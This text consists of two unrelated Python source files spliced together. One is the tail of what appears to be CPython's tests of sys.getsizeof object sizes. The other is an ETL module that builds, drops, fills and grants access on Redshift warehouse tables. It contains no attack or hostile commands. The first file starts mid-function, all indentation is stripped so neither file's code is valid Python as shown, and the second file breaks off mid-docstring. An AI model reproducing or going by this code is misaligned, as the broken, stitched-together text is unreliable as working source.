self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 8 + 5*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0P") + 16 + 10*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
if __name__ == "__main__":
unittest.main()
|
load.py
|
"""
This is the "load and transform" part of our ELT.
There are three options for accomplishing this:
(1) a "load" command will start building the data warehouse from scratch, usually, after backing up.
(2) an "upgrade" command will try to load new data and changed relations (without any back up).
(3) an "update" command will attempt to bring in new data and new relations, then let it percolate.
The "load" command is used in the rebuild pipeline. It is important to notice that
it always operates on all tables in any schemas impacted by the load.
The "update" command is used in the refresh pipeline. It is safe to run (and safe to
re-run) to bring in new data. It cannot be used to make a structural change. Basically,
"update" will respect the boundaries set by "publishing" the data warehouse state in S3
as "current".
The "upgrade" command should probably be used only during development. Think of an "upgrade" as a
"load" without the safety net. Unlike "load", it will upgrade more surgically and not expand
to modify entire schemas, but unlike "update" it will not go gently about it.
(It is still somewhat expensive given the cautious build-up and permission changes.)
It is possible to bring up an "empty" data warehouse where all the structure exists
(meaning all the tables and views are in place) but no data was actually loaded.
This is used during the validation pipeline. See the "skip copy" options.
These are the general pre-requisites:
* "Tables" that have upstream sources must have data files and a manifest file from a prior
extract.
* "CTAS" tables are derived from queries so must have a SQL file.
* For every derived table (CTAS) a SQL file must exist in S3 with a valid
expression to create the content of the table (meaning: just the select without
closing ';'). The actual DDL statement (CREATE TABLE AS ...) and the table
attributes / constraints are added from the matching table design file.
* "VIEWS" are views and so must have a SQL file in S3.
Currently, CSV, Avro, and JSON-formatted data files are supported.
"""
import concurrent.futures
import logging
import queue
import re
import threading
import time
from calendar import timegm
from collections import defaultdict
from contextlib import closing
from datetime import datetime, timedelta
from functools import partial
from typing import Any, Dict, List, Optional, Sequence, Set
import funcy
from psycopg2.extensions import connection # only for type annotation
import etl
import etl.data_warehouse
import etl.db
import etl.dialect.redshift
import etl.monitor
import etl.relation
from etl.config.dw import DataWarehouseSchema
from etl.errors import (
ETLRuntimeError,
FailedConstraintError,
MissingExtractEventError,
MissingManifestError,
RelationConstructionError,
RelationDataError,
RequiredRelationLoadError,
UpdateTableError,
)
from etl.names import TableName, TableSelector, TempTableName
from etl.relation import RelationDescription
from etl.text import format_lines, join_with_double_quotes, join_with_single_quotes
from etl.util.retry import call_with_retry
from etl.util.timer import Timer
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
# --- Section 0: Foundation: LoadableRelation
class LoadableRelation:
"""
Wrapper for RelationDescription that adds state machinery useful for loading.
Loading here refers to the step in the ETL, so includes the load, upgrade, and update commands.
We use composition here to avoid copying from the RelationDescription.
Also, inheritance would work less well given how lazy loading is used in RelationDescription.
You're welcome.
Being 'Loadable' means that load-relevant RelationDescription properties may get new values
here. In particular:
- target_table_name is 'use_staging' aware
- query_stmt is 'use_staging' aware
However, dependency graph properties of RelationDescription should _not_ differ.
In particular:
- identifier should be consistent
- dependencies should be consistent
Q: Why 'loadable'?
A: Because 'LoadOrUpgradeOrUpdateInProgress' sounded less supercalifragilisticexpialidocious.
"""
def __getattr__(self, name):
"""Grab everything from the contained relation. Fail if it's actually not available."""
if hasattr(self._relation_description, name):
return getattr(self._relation_description, name)
raise AttributeError(f"'{self.__class__.__name__}' object has no attribute '{name}'")
def __str__(self) -> str:
return str(self.target_table_name)
def __format__(self, code):
r"""
Format target table as delimited identifier (with quotes) or just as an identifier.
With the default or ':s', it's a delimited identifier with quotes.
With ':x", the name is left bare but single quotes are around it.
Compared to RelationDescription, we have the additional complexity of dealing with
the position (staging or not) of a table.
>>> import etl.file_sets
>>> import etl.config
>>> from collections import namedtuple
>>> MockDWConfig = namedtuple('MockDWConfig', ['schemas'])
>>> MockSchema = namedtuple('MockSchema', ['name'])
>>> etl.config._dw_config = MockDWConfig(schemas=[MockSchema(name='c')])
>>> fs = etl.file_sets.RelationFileSet(TableName("a", "b"), TableName("c", "b"), None)
>>> relation = LoadableRelation(RelationDescription(fs), {}, skip_copy=True)
>>> "As delimited identifier: {:s}, as string: {:x}".format(relation, relation)
'As delimited identifier: "c"."b", as string: \'c.b\''
>>> relation_with_staging = LoadableRelation(
... RelationDescription(fs), {}, use_staging=True, skip_copy=True)
>>> "As delimited identifier: {:s}, as string: {:x}".format(
... relation_with_staging, relation_with_staging)
'As delimited identifier: "etl_staging$c"."b", as string: \'c.b\' (in staging)'
"""
if (not code) or (code == "s"):
return str(self)
if code == "x":
if self.use_staging:
return "'{:s}' (in staging)".format(self.identifier)
return "'{:s}'".format(self.identifier)
raise ValueError("unsupported format code '{}' passed to LoadableRelation".format(code))
def __init__(
self,
relation: RelationDescription,
info: dict,
use_staging=False,
target_schema: Optional[str] = None,
skip_copy=False,
in_transaction=False,
) -> None:
self._relation_description = relation
self.info = info
self.in_transaction = in_transaction
self.skip_copy = skip_copy
self.use_staging = use_staging
self.failed = False
if target_schema is not None:
self.target_table_name = TableName(
target_schema, self._relation_description.target_table_name.table
)
elif self.use_staging:
self.target_table_name = self._relation_description.target_table_name.as_staging_table_name()
else:
self.target_table_name = self._relation_description.target_table_name
def monitor(self):
return etl.monitor.Monitor(**self.info)
@property
def identifier(self) -> str:
# Load context should not change the identifier for logging.
if self.use_staging:
return self._relation_description.identifier
return self.target_table_name.identifier
def find_dependents(self, relations: Sequence["LoadableRelation"]) -> List["LoadableRelation"]:
unpacked = [
r._relation_description for r in relations
] # do DAG operations in terms of RelationDescriptions
dependent_relations = etl.relation.find_dependents(unpacked, [self._relation_description])
dependent_relation_identifiers = {r.identifier for r in dependent_relations}
return [
loadable for loadable in relations if loadable.identifier in dependent_relation_identifiers
]
def mark_failure(self, relations: Sequence["LoadableRelation"], exc_info=True) -> None:
"""Mark this relation as failed and set dependents (stored in :relations) to skip_copy."""
self.failed = True
if self.is_required:
logger.error("Failed to build required relation '%s':", self.identifier, exc_info=exc_info)
else:
logger.warning("Failed to build relation '%s':", self.identifier, exc_info=exc_info)
# Skip copy on all dependents
dependents = self.find_dependents(relations)
for dep in dependents:
dep.skip_copy = True
identifiers = [dependent.identifier for dependent in dependents]
if identifiers:
logger.warning(
"Continuing while leaving %d relation(s) empty: %s",
len(identifiers),
join_with_single_quotes(identifiers),
)
@property
def query_stmt(self) -> str:
stmt = self._relation_description.query_stmt
if self.use_staging:
# Rewrite the query to use staging schemas by changing identifiers to their staging
# version. This requires all tables to be fully qualified. There is a small chance
# that we're too aggressive and change a table name inside a string.
for dependency in self.dependencies:
staging_dependency = dependency.as_staging_table_name()
stmt = re.sub(dependency.identifier_as_re, staging_dependency.identifier, stmt)
return stmt
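# Illustrative sketch of the rewrite above, using hypothetical relation names: with
# use_staging=True, a reference to a dependency such as web.orders inside the query text is
# substituted by its staging counterpart, e.g. etl_staging$web.orders (the "etl_staging$"
# schema prefix matches the __format__ doctest above). The regex-based substitution is why the
# comment warns that a table name appearing inside a string literal could also be rewritten.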
@property
def table_design(self) -> Dict[str, Any]:
design = self._relation_description.table_design
if self.use_staging:
# Rewrite foreign table references to point into the correct table
for column in design["columns"]:
if "references" in column:
[foreign_table, [foreign_column]] = column["references"]
column["references"] = [
TableName.from_identifier(foreign_table).as_staging_table_name().identifier,
[foreign_column],
]
return design
@classmethod
def from_descriptions(
cls,
relations: Sequence[RelationDescription],
command: str,
use_staging=False,
target_schema: Optional[str] = None,
skip_copy=False,
skip_loading_sources=False,
in_transaction=False,
) -> List["LoadableRelation"]:
"""Build a list of "loadable" relations."""
dsn_etl = etl.config.get_dw_config().dsn_etl
database = dsn_etl["database"]
base_index = {"name": database, "current": 0, "final": len(relations)}
base_destination = {"name": database}
managed = frozenset(relation.identifier for relation in relations)
loadable = []
for i, relation in enumerate(relations):
this_skip_copy = skip_copy
if skip_loading_sources:
# Only load transformations and only if no dependency is external.
if not relation.is_transformation or any(
dependency.identifier not in managed for dependency in relation.dependencies
):
this_skip_copy = True
target = relation.target_table_name
source = {"bucket_name": relation.bucket_name}
if relation.is_transformation:
source["object_key"] = relation.sql_file_name
else:
source["object_key"] = relation.manifest_file_name
destination = dict(base_destination, schema=target.schema, table=target.table)
monitor_info = {
"target": target.identifier,
"step": command,
"source": source,
"destination": destination,
"options": {"use_staging": use_staging, "skip_copy": this_skip_copy},
"index": dict(base_index, current=i + 1),
}
loadable.append(
cls(relation, monitor_info, use_staging, target_schema, this_skip_copy, in_transaction)
)
return loadable
# --- Section 1: Functions that work on relations (creating them, filling them, adding permissions)
def create_table(
conn: connection, relation: LoadableRelation, table_name: Optional[TableName] = None, dry_run=False
) -> None:
"""
Create a table matching this design (but possibly under another name).
If a name is specified, we'll assume that this should be an intermediate, aka temp table.
Columns must have a name and a SQL type (compatible with Redshift).
They may have attributes such as a compression encoding and a nullable constraint.
Other column attributes and constraints should be resolved as table
attributes (e.g. distkey) and table constraints (e.g. primary key).
Tables may have attributes such as a distribution style and sort key.
Depending on the distribution style, they may also have a distribution key.
"""
if table_name is None:
ddl_table_name = relation.target_table_name
message = "Creating table {:x}".format(relation)
is_temp = False
else:
ddl_table_name = table_name
message = "Creating temporary table for {:x}".format(relation)
is_temp = True
ddl_stmt = etl.dialect.redshift.build_table_ddl(
ddl_table_name, relation.table_design, is_temp=is_temp
)
etl.db.run(conn, message, ddl_stmt, dry_run=dry_run)
def create_view(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""Create VIEW using the relation's query."""
ddl_view_name = relation.target_table_name
stmt = etl.dialect.redshift.build_view_ddl(
ddl_view_name, relation.unquoted_columns, relation.query_stmt
)
etl.db.run(conn, "Creating view {:x}".format(relation), stmt, dry_run=dry_run)
def drop_relation_if_exists(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Run either DROP VIEW or DROP TABLE depending on type of existing relation.
It's ok if the relation doesn't already exist.
"""
try:
kind = etl.db.relation_kind(
conn, relation.target_table_name.schema, relation.target_table_name.table
)
if kind is not None:
stmt = """DROP {} {} CASCADE""".format(kind, relation)
etl.db.run(conn, "Dropping {} {:x}".format(kind.lower(), relation), stmt, dry_run=dry_run)
except Exception as exc:
raise RelationConstructionError(exc) from exc
def create_or_replace_relation(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Create fresh VIEW or TABLE and grant groups access permissions.
Note that we cannot use CREATE OR REPLACE statements since we want to allow going back and forth
between VIEW and TABLE (or in table design terms: VIEW and CTAS).
"""
try:
drop_relation_if_exists(conn, relation, dry_run=dry_run)
if relation.is_view_relation:
create_view(conn, relation, dry_run=dry_run)
else:
create_table(conn, relation, dry_run=dry_run)
grant_access(conn, relation, dry_run=dry_run)
except Exception as exc:
raise RelationConstructionError(exc) from exc
def grant_access(conn: connection, relation: LoadableRelation, dry_run=False):
"""
Grant privileges on (new) relation based on configuration.
We always grant all privileges to the ETL user. We may grant read-only access
or read-write access based on configuration. Note that the access is always based on groups,
not users.
"""
target = relation.target_table_name
schema_config = relation.schema_config
reader_groups, writer_groups = schema_config.reader_groups, schema_config.writer_groups
if reader_groups:
if dry_run:
logger.info(
"Dry-run: Skipping granting of select access on {:x} to {}".format(
relation, join_with_single_quotes(reader_groups)
)
)
else:
logger.info(
"Granting select access on {:x} to {}".format(
relation, join_with_single_quotes(reader_groups)
)
)
for reader in reader_groups:
etl.db.grant_select(conn, target.schema, target.table, reader)
if writer_groups:
if dry_run:
logger.info(
"Dry-run: Skipping granting of write access on {:x} to {}".format(
relation, join_with_single_quotes(writer_groups)
)
)
else:
logger.info(
"Granting write access on {:x} to {}".format(
relation, join_with_single_quotes(writer_groups)
)
)
for writer in writer_groups:
etl.db.grant_select_and_write(conn, target.schema, target.table, writer)
def delete_whole_table(conn: connection, table: LoadableRelation, dry_run=False) -> None:
"""Delete all rows from this table."""
stmt = """DELETE FROM {}""".format(table)
etl.db.run(conn, "Deleting all rows in table {:x}".format(table), stmt, dry_run=dry_run)
def copy_data(conn: connection, relation: LoadableRelation, dry_run=False):
"""
Load data into table in the data warehouse using the COPY command.
A manifest for the CSV files must be provided -- it is an error if the manifest is missing.
"""
aws_iam_role = str(etl.config.get_config_value("object_store.iam_role"))
s3_uri = "s3://{}/{}".format(relation.bucket_name, relation.manifest_file_name)
if not relation.has_manifest:
if dry_run:
logger.info(
"Dry-run: Ignoring that relation '{}' is missing manifest file '{}'".format(
relation.identifier, s3_uri
)
)
else:
raise MissingManifestError(
"relation '{}' is missing manifest file '{}'".format(relation.identifier, s3_uri)
)
copy_func = partial(
etl.dialect.redshift.copy_from_uri,
conn,
relation.target_table_name,
relation.unquoted_columns,
s3_uri,
aws_iam_role,
data_format=relation.schema_config.s3_data_format.format,
format_option=relation.schema_config.s3_data_format.format_option,
file_compression=relation.schema_config.s3_data_format.compression,
dry_run=dry_run,
)
if relation.in_transaction:
copy_func()
else:
call_with_retry(etl.config.get_config_int("arthur_settings.copy_data_retries"), copy_func)
def insert_from_query(
conn: connection,
relation: LoadableRelation,
table_name: Optional[TableName] = None,
columns: Optional[Sequence[str]] = None,
query_stmt: Optional[str] = None,
dry_run=False,
) -> None:
"""
Load data into table from its query (aka materializing a view).
The table name, query, and columns may be overridden from their defaults, which are the
values from the relation.
"""
if table_name is None:
table_name = relation.target_table_name
if columns is None:
columns = relation.unquoted_columns
if query_stmt is None:
query_stmt = relation.query_stmt
insert_func = partial(
etl.dialect.redshift.insert_from_query, conn, table_name, columns, query_stmt, dry_run=dry_run
)
if relation.in_transaction:
insert_func()
else:
call_with_retry(etl.config.get_config_int("arthur_settings.insert_data_retries"), insert_func)
def load_ctas_directly(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Run query to fill CTAS relation.
(Not to be used for dimensions, etc.)
"""
insert_from_query(conn, relation, dry_run=dry_run)
def create_missing_dimension_row(columns: Sequence[dict]) -> List[str]:
"""Return row that represents missing dimension values."""
na_values_row = []
for column in columns:
if column.get("skipped", False):
continue
elif column.get("identity", False):
na_values_row.append("0")
else:
if not column.get("not_null", False):
# Use NULL for any nullable column and use type cast (for UNION ALL to succeed)
na_values_row.append("NULL::{}".format(column["sql_type"]))
elif "timestamp" in column["sql_type"]:
na_values_row.append("'0000-01-01 00:00:00'")
elif "boolean" in column["type"]:
na_values_row.append("false")
elif "string" in column["type"]:
na_values_row.append("'N/A'")
else:
na_values_row.append("0")
return na_values_row
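# A hypothetical example of what create_missing_dimension_row returns: given columns such as
#   [{"name": "user_key", "identity": True},
#    {"name": "user_name", "type": "string", "sql_type": "varchar(255)", "not_null": True},
#    {"name": "signed_up_at", "sql_type": "timestamp", "not_null": True},
#    {"name": "is_active", "type": "boolean", "sql_type": "boolean", "not_null": True},
#    {"name": "lifetime_value", "type": "number", "sql_type": "numeric(18,2)"}]
# the returned row would be roughly:
#   ["0", "'N/A'", "'0000-01-01 00:00:00'", "false", "NULL::numeric(18,2)"]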
def load_ctas_using_temp_table(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""Run query to fill temp table and copy data (option: with missing dimension) into target."""
temp_name = TempTableName.for_table(relation.target_table_name)
create_table(conn, relation, table_name=temp_name, dry_run=dry_run)
try:
temp_columns = [
column["name"]
for column in relation.table_design["columns"]
if not (column.get("skipped") or column.get("identity"))
]
insert_from_query(conn, relation, table_name=temp_name, columns=temp_columns, dry_run=dry_run)
inner_stmt = "SELECT {} FROM {}".format(
join_with_double_quotes(relation.unquoted_columns), temp_name
)
if relation.target_table_name.table.startswith("dim_"):
missing_dimension = create_missing_dimension_row(relation.table_design["columns"])
inner_stmt += "\nUNION ALL SELECT {}".format(", ".join(missing_dimension))
insert_from_query(conn, relation, query_stmt=inner_stmt, dry_run=dry_run)
finally:
stmt = "DROP TABLE {}".format(temp_name)
etl.db.run(conn, "Dropping temporary table for {:x}".format(relation), stmt, dry_run=dry_run)
def analyze(conn: connection, table: LoadableRelation, dry_run=False) -> None:
"""Update table statistics."""
etl.db.run(
conn,
"Running analyze step on table {:x}".format(table),
"ANALYZE {}".format(table),
dry_run=dry_run,
)
def verify_constraints(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Raise a FailedConstraintError if :relation's target table doesn't obey its declared constraints.
Note that NULL in SQL is never equal to another value. This means for unique constraints that
rows where (at least) one column is null are not equal even if they have the same values in the
not-null columns. See description of unique index in the PostgreSQL documentation:
https://www.postgresql.org/docs/8.1/static/indexes-unique.html
For constraints that check "key" values (like 'primary_key'), this warning does not apply since
the columns must be not null anyway.
> "Note that a unique constraint does not, by itself, provide a unique identifier because it
> does not exclude null values."
https://www.postgresql.org/docs/8.1/static/ddl-constraints.html
"""
constraints = relation.table_design.get("constraints")
if constraints is None:
logger.info("No constraints to verify for '{:s}'".format(relation.identifier))
return
# To make this work in DataGrip, define '\{(\w+)\}' under Tools -> Database -> User Parameters.
# Then execute the SQL using command-enter, enter the values for `cols` and `table`, et voilà!
statement_template = """
SELECT DISTINCT
{columns}
FROM {table_}
WHERE {condition}
GROUP BY {columns}
HAVING COUNT(*) > 1
LIMIT {limit_}
"""
limit = 5 # arbitrarily chosen limit of examples to show
for constraint in constraints:
[[constraint_type, columns]] = constraint.items() # There will always be exactly one item.
quoted_columns = join_with_double_quotes(columns)
if constraint_type == "unique":
condition = " AND ".join('"{}" IS NOT NULL'.format(name) for name in columns)
else:
condition = "TRUE"
statement = statement_template.format(
columns=quoted_columns, table_=relation, condition=condition, limit_=limit
)
if dry_run:
logger.info(
"Dry-run: Skipping check of {} constraint in {:x} on column(s): {}".format(
constraint_type, relation, join_with_single_quotes(columns)
)
)
etl.db.skip_query(conn, statement)
else:
logger.info(
"Checking {} constraint in {:x} on column(s): {}".format(
constraint_type, relation, join_with_single_quotes(columns)
)
)
results = etl.db.query(conn, statement)
if results:
if len(results) == limit:
logger.error(
"Constraint check for {:x} failed on at least {:d} row(s)".format(
relation, len(results)
)
)
else:
logger.error(
"Constraint check for {:x} failed on {:d} row(s)".format(relation, len(results))
)
raise FailedConstraintError(relation, constraint_type, columns, results)
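# For orientation, a hypothetical rendering of statement_template above for a "unique"
# constraint on columns (user_id, email) of relation "c"."b" would look roughly like:
#   SELECT DISTINCT "user_id", "email"
#   FROM "c"."b"
#   WHERE "user_id" IS NOT NULL AND "email" IS NOT NULL
#   GROUP BY "user_id", "email"
#   HAVING COUNT(*) > 1
#   LIMIT 5
# Any row returned is a set of duplicated values, which triggers the FailedConstraintError.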
# --- Section 2: Functions that work on schemas
def find_traversed_schemas(relations: Sequence[LoadableRelation]) -> List[DataWarehouseSchema]:
"""Return schemas traversed when refreshing relations (in order that they are needed)."""
got_it: Set[str] = set()
traversed_in_order = []
for relation in relations:
this_schema = relation.schema_config
if this_schema.name not in got_it:
got_it.add(this_schema.name)
traversed_in_order.append(this_schema)
return traversed_in_order
def create_schemas_for_rebuild(
schemas: Sequence[DataWarehouseSchema], use_staging: bool, dry_run=False
) -> None:
"""
Create schemas necessary for a full rebuild of data warehouse.
If `use_staging`, only create new staging schemas.
Otherwise, move standard position schemas out of the way by renaming them. Then create new ones.
"""
if use_staging:
etl.data_warehouse.create_schemas(schemas, use_staging=use_staging, dry_run=dry_run)
else:
etl.data_warehouse.backup_schemas(schemas, dry_run=dry_run)
etl.data_warehouse.create_schemas(schemas, dry_run=dry_run)
# --- Section 3: Functions that tie table operations together
def update_table(conn: connection, relation: LoadableRelation, dry_run=False) -> None:
"""
Update table contents either from CSV files from upstream sources or by running some SQL query.
This assumes that the table was previously created.
1. For tables backed by upstream sources, data is copied in.
2. If the CTAS doesn't have a key (no identity column), then values are inserted straight
from a view.
3. If a column is marked as being a key (identity is true), then a temporary table is built
from the query and then copied into the "CTAS" relation. If the name of the relation starts
with "dim_", then it's assumed to be a dimension and a row with missing values (mostly 0,
false, etc.) is added as well.
Finally, we run an ANALYZE statement to update table statistics (unless we're updating the
